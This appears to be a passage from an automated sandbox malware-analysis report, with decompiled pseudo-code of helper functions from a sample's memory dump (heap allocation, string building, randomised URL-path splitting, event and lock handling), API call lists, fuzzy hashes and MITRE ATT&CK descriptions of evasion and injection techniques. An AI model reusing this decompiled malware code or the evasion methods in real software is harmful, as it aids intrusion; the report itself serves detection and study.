				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x44bd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x44bd250; // 0xccd9c899
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x44bd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x044b2078
0x044b207b
0x044b2081
0x044b2099
0x044b209b
0x044b20a0
0x044b20a2
0x044b20a5
0x044b20a7
0x044b20aa
0x044b20ac
0x044b20ac
0x044b20ae
0x044b20b9
0x044b20be
0x044b20cf
0x044b20d7
0x044b20dc
0x044b20df
0x044b20e2
0x044b20e4
0x044b20e7
0x044b20ea
0x044b20ea
0x044b20ed
0x044b20f8
0x044b20fd
0x044b2107

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,044B6A62,00000000,?,?,044B88FB,?,04D895B0), ref: 044B207B
RtlAllocateHeap.NTDLL(00000000,?), ref: 044B2093
memcpy.NTDLL(00000000,04D895B0,-00000008,?,?,?,044B6A62,00000000,?,?,044B88FB,?,04D895B0), ref: 044B20D7
memcpy.NTDLL(00000001,04D895B0,00000001,044B88FB,?,04D895B0), ref: 044B20F8

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 4c20283e78d2f5c3796a49046197959997ab96bd29fbad667bdeda1635d9cc70
Instruction ID: 842671ab7efe7f5fc6035c970552f0245da94b26ba2bd08dd7556ae214646f9c
Opcode Fuzzy Hash: 4c20283e78d2f5c3796a49046197959997ab96bd29fbad667bdeda1635d9cc70
Instruction Fuzzy Hash: 0311C672A00154BFE7148AA9DC88D9ABBEEEBD5260B0501BAF54497240E7749E01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 044B1C78, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E044B1C78(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E044B5043(_t8, _t1);
				_t16 = E044B6D10(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E044BA677(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E044B6D10(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E044B45B3(_t16);
				}
				return _t18;
			}

0x044b1c83
0x044b1c84
0x044b1c87
0x044b1c89
0x044b1c94
0x044b1c98
0x044b1c9d
0x044b1ca1
0x044b1ca9
0x044b1cae
0x044b1cb6
0x044b1cb6
0x044b1cbf
0x044b1cc3
0x044b1cc9
0x044b1ccc
0x044b1cd2
0x044b1cd2
0x044b1cda
0x044b1cda
0x044b1ce1
0x044b1ce1
0x044b1cec

APIs

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

Part of subcall function 044BA677: wsprintfA.USER32 ref: 044BA6D3

lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,044B8594,74666F53,00000000,?,044BD00C,?,?), ref: 044B1CAE
lstrcpy.KERNEL32(00000000,00000000), ref: 044B1CD2
lstrcat.KERNEL32(00000000,00000000), ref: 044B1CDA

Strings

Soft, xrefs: 044B1C84, 044B1C9D

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: e839048830ae4560e6c0e8ea7bc9a53573049ea73c479a8de5d1b5158a9d5b93
Instruction ID: aab7855c03b0f0c5ce5617d86e3866eeeef1716f2f98dd46d3cd68b3a851d8d3
Opcode Fuzzy Hash: e839048830ae4560e6c0e8ea7bc9a53573049ea73c479a8de5d1b5158a9d5b93
Instruction Fuzzy Hash: 8E01A232100515B7EF123FA9DCC4AEF3ABCEF84289F14442AFA4456201DB79A9418BF1

Uniqueness

Uniqueness Score: -1.00%

Function 044BA40A, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044BA40A(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x044ba414
0x044ba418
0x044ba42d
0x044ba42f
0x044ba434
0x044ba43a
0x044ba43c
0x044ba441
0x044ba44c
0x044ba443
0x044ba443
0x044ba443
0x044ba441
0x044ba45a

APIs

memset.NTDLL ref: 044BA418
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,751881D0,00000000,00000000), ref: 044BA42D
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 044BA43A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044B896D,00000000,?), ref: 044BA44C

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: a54e966e35f8a32199ec90828f8c68d5be09e6f6f12ea8c05e6a163b02b3fb7a
Instruction ID: 1b3ffe64fdba5fa308e5b7e600de8e8637c17f899c8cf6450420c82bf61d973c
Opcode Fuzzy Hash: a54e966e35f8a32199ec90828f8c68d5be09e6f6f12ea8c05e6a163b02b3fb7a
Instruction Fuzzy Hash: D3F05EB1104708BFE7206F66DCC4C6BBBACEB42298B11892FF18292501D675EC054AB0

Uniqueness

Uniqueness Score: -1.00%

Function 044B6555, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E044B6555(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E044B6D10(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}

0x044b6558
0x044b655c
0x044b655e
0x044b6564
0x044b6568
0x044b656a
0x044b656a
0x044b656c
0x044b6575
0x044b6579
0x044b6581
0x044b6590
0x044b6595
0x044b659d

APIs

lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,044BA3DD,00000000,00000005,044BD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 044B655E
memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,044B2018,?,?,?,4D283A53,?,?), ref: 044B6581
memset.NTDLL ref: 044B6590

Strings

S:(M, xrefs: 044B6558

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpymemset
String ID: S:(M
API String ID: 4042389641-2217774225
Opcode ID: 4e4e93067c5e824fa42b92c840094dd2196e3c3d67235eed3c3110687f0a7de2
Instruction ID: 9368a0d455ea9075fe73afb80b09cb2fd205adad0e6de0e7176cec392a30ed6f
Opcode Fuzzy Hash: 4e4e93067c5e824fa42b92c840094dd2196e3c3d67235eed3c3110687f0a7de2
Instruction Fuzzy Hash: 3AE0E5B390032127DA3069B96CC8DCB2A9CDBD8250B01082AFD8597205D520E82486F1

Uniqueness

Uniqueness Score: -1.00%

Function 044B4FDC, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E044B4FDC(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x44bd324; // 0x4d895b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x44bd324; // 0x4d895b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x44bd030) {
					HeapFree( *0x44bd238, 0, _t8);
				}
				_t14[1] = E044BA5F5(_v0, _t14);
				_t11 =  *0x44bd324; // 0x4d895b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x044b4fdc
0x044b4fdc
0x044b4fe5
0x044b4ff5
0x044b4ff5
0x044b4ffa
0x044b4fff
0x00000000
0x00000000
0x044b4fef
0x044b4fef
0x044b5001
0x044b5005
0x044b5017
0x044b5017
0x044b5027
0x044b502a
0x044b502f
0x044b5033
0x044b5039

APIs

RtlEnterCriticalSection.NTDLL(04D89570), ref: 044B4FE5
Sleep.KERNEL32(0000000A,?,?,?,044B2018,?,?,?,4D283A53,?,?), ref: 044B4FEF
HeapFree.KERNEL32(00000000,00000000,?,?,?,044B2018,?,?,?,4D283A53,?,?), ref: 044B5017
RtlLeaveCriticalSection.NTDLL(04D89570), ref: 044B5033

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 5e7cab84c272fd3ce5f2569ac4942e0f2f983507f70ad5f11193515915dbf4fd
Instruction ID: cf84439910ef92ddabe92256f8683dc455eda4a5920bc41800e0989f53e5f59c
Opcode Fuzzy Hash: 5e7cab84c272fd3ce5f2569ac4942e0f2f983507f70ad5f11193515915dbf4fd
Instruction Fuzzy Hash: C9F034B1A00A41ABFF249FA8D988E4A77E4EB18704B008449F481D7242DB38FC50DAF5

Uniqueness

Uniqueness Score: -1.00%

Function 044B6DA6, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B6DA6() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x44bd26c; // 0x318
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x44bd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x44bd26c; // 0x318
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x44bd238; // 0x4990000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x044b6da6
0x044b6dad
0x044b6df7
0x044b6df9
0x044b6df9
0x044b6db1
0x044b6db7
0x044b6dbc
0x044b6dc0
0x044b6dc6
0x044b6dcd
0x00000000
0x00000000
0x044b6dcf
0x044b6dd4
0x00000000
0x00000000
0x00000000
0x044b6dd4
0x044b6dd6
0x044b6dde
0x044b6de1
0x044b6de1
0x044b6de7
0x044b6dee
0x044b6df1
0x044b6df1
0x00000000

APIs

SetEvent.KERNEL32(00000318,00000001,044B2228), ref: 044B6DB1
SleepEx.KERNEL32(00000064,00000001), ref: 044B6DC0
CloseHandle.KERNEL32(00000318), ref: 044B6DE1
HeapDestroy.KERNEL32(04990000), ref: 044B6DF1

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: ae52354238d618de16114287f240a54cdb9d0863e1493fdb4908cc2cf67e3ddd
Instruction ID: a15748b2bc57cbaca5df1c1628d16b03c755f33dc3f48279c612145fc76cb60c
Opcode Fuzzy Hash: ae52354238d618de16114287f240a54cdb9d0863e1493fdb4908cc2cf67e3ddd
Instruction Fuzzy Hash: EAF030B5A017529BFF146B75ADCCA97BBACEB04761B050169BC80D7380DB38EC0095F1

Uniqueness

Uniqueness Score: -1.00%

Function 044B6B92, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E044B6B92() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x44bd324; // 0x4d895b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x44bd324; // 0x4d895b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x44bd324; // 0x4d895b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x44be845) {
					HeapFree( *0x44bd238, 0, _t10);
					_t7 =  *0x44bd324; // 0x4d895b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x044b6b92
0x044b6b9b
0x044b6bab
0x044b6bab
0x044b6bb0
0x044b6bb5
0x00000000
0x00000000
0x044b6ba5
0x044b6ba5
0x044b6bb7
0x044b6bbc
0x044b6bc0
0x044b6bd3
0x044b6bd9
0x044b6bd9
0x044b6be2
0x044b6be4
0x044b6be8
0x044b6bee

APIs

RtlEnterCriticalSection.NTDLL(04D89570), ref: 044B6B9B
Sleep.KERNEL32(0000000A,?,?,?,044B2018,?,?,?,4D283A53,?,?), ref: 044B6BA5
HeapFree.KERNEL32(00000000,?,?,?,?,044B2018,?,?,?,4D283A53,?,?), ref: 044B6BD3
RtlLeaveCriticalSection.NTDLL(04D89570), ref: 044B6BE8

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 716f223096d7adfdd0e0d9c6ac889ec5e9bc0814e24f587b142a04ee2608a3f2
Instruction ID: fe3e60395e6152f60aca45d5894ba743b83f7867501104dc9694f5ab49ec1710
Opcode Fuzzy Hash: 716f223096d7adfdd0e0d9c6ac889ec5e9bc0814e24f587b142a04ee2608a3f2
Instruction Fuzzy Hash: BDF0B2B4A046119FFF588F64D989A5637F5EB58300B054049A442DB351CB38AC51DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 044B4F14, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E044B4F14(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E044B6D10(_t2);
				if(_t34 != 0) {
					_t30 = E044B6D10(_t28);
					if(_t30 == 0) {
						E044B45B3(_t34);
					} else {
						_t39 = _a4;
						_t22 = E044BA6E0(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E044BA6E0(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x044b4f14
0x044b4f1e
0x044b4f20
0x044b4f26
0x044b4f26
0x044b4f2f
0x044b4f33
0x044b4f3f
0x044b4f43
0x044b4fb7
0x044b4f45
0x044b4f45
0x044b4f49
0x044b4f4e
0x044b4f53
0x044b4f6d
0x044b4f5c
0x044b4f5c
0x044b4f60
0x044b4f63
0x044b4f68
0x044b4f68
0x044b4f72
0x044b4f9a
0x044b4fa0
0x044b4fa3
0x044b4f74
0x044b4f76
0x044b4f7e
0x044b4f89
0x044b4f8e
0x044b4f8e
0x044b4faa
0x044b4fb1
0x044b4fb2
0x044b4fb2
0x044b4f43
0x044b4fc2

APIs

lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,044B3F7D,?,?,?,?,00000102,044B519D,?,?,751881D0), ref: 044B4F20

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

Part of subcall function 044BA6E0: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,044B4F4E,00000000,00000001,00000001,?,?,044B3F7D,?,?,?,?,00000102), ref: 044BA6EE
Part of subcall function 044BA6E0: StrChrA.SHLWAPI(?,0000003F,?,?,044B3F7D,?,?,?,?,00000102,044B519D,?,?,751881D0,00000000), ref: 044BA6F8

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044B3F7D,?,?,?,?,00000102,044B519D,?), ref: 044B4F7E
lstrcpy.KERNEL32(00000000,00000000), ref: 044B4F8E
lstrcpy.KERNEL32(00000000,00000000), ref: 044B4F9A

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: dc2f5e5d89645b948701886e62803dcb6757ab51a4db956cd54f97a0b39a9f1c
Instruction ID: 0a018fcb311ee9b9da877d30d819110f693f418501e7a6e77d3759cb6fca12d3
Opcode Fuzzy Hash: dc2f5e5d89645b948701886e62803dcb6757ab51a4db956cd54f97a0b39a9f1c
Instruction Fuzzy Hash: F5219072504255ABDF126FA9C884AEB7FE8DF46284B05405AF9849B202EB34F9009BF0

Uniqueness

Uniqueness Score: -1.00%

Function 044B241A, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B241A(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E044B6D10(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x044b242f
0x044b2433
0x044b243d
0x044b2442
0x044b2447
0x044b2449
0x044b2451
0x044b2456
0x044b2464
0x044b2469
0x044b2473

APIs

lstrlenW.KERNEL32(004F0053,?,75145520,00000008,04D8934C,?,044B6AFE,004F0053,04D8934C,?,?,?,?,?,?,044B61D1), ref: 044B242A
lstrlenW.KERNEL32(044B6AFE,?,044B6AFE,004F0053,04D8934C,?,?,?,?,?,?,044B61D1), ref: 044B2431

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

memcpy.NTDLL(00000000,004F0053,751469A0,?,?,044B6AFE,004F0053,04D8934C,?,?,?,?,?,?,044B61D1), ref: 044B2451
memcpy.NTDLL(751469A0,044B6AFE,00000002,00000000,004F0053,751469A0,?,?,044B6AFE,004F0053,04D8934C), ref: 044B2464

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 14c5f969902c398e8045f9a3ecd767540f201ce8647d401c6775b03496cfc419
Instruction ID: 2045e5af568fa89883c8c07b7e6052cd779c7a5dda80537ef9dd961a33618f3f
Opcode Fuzzy Hash: 14c5f969902c398e8045f9a3ecd767540f201ce8647d401c6775b03496cfc419
Instruction Fuzzy Hash: DBF03C32900118BB9F11AFA9CC89CDF7BACEF092587154467B90497201E675EA108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B5FD1, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(044B8932,00000000,00000000,044B8932,616D692F,00000000), ref: 044B5FDD
lstrlen.KERNEL32(?), ref: 044B5FE5

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

lstrcpy.KERNEL32(00000000,?), ref: 044B5FFC
lstrcat.KERNEL32(00000000,?), ref: 044B6007

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: e18c3e6eef31d951abe9bff557c42a1eb715b4ab225029e999275474a9755768
Instruction ID: 5f2c3b1482445d6313413857179a6ac10d262793440098658b9d4486325287d0
Opcode Fuzzy Hash: e18c3e6eef31d951abe9bff557c42a1eb715b4ab225029e999275474a9755768
Instruction Fuzzy Hash: E8E01233405A21AB8B126FE5AC48C8FBBA9FF89250B05491AF64093110CB35D8158BE1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

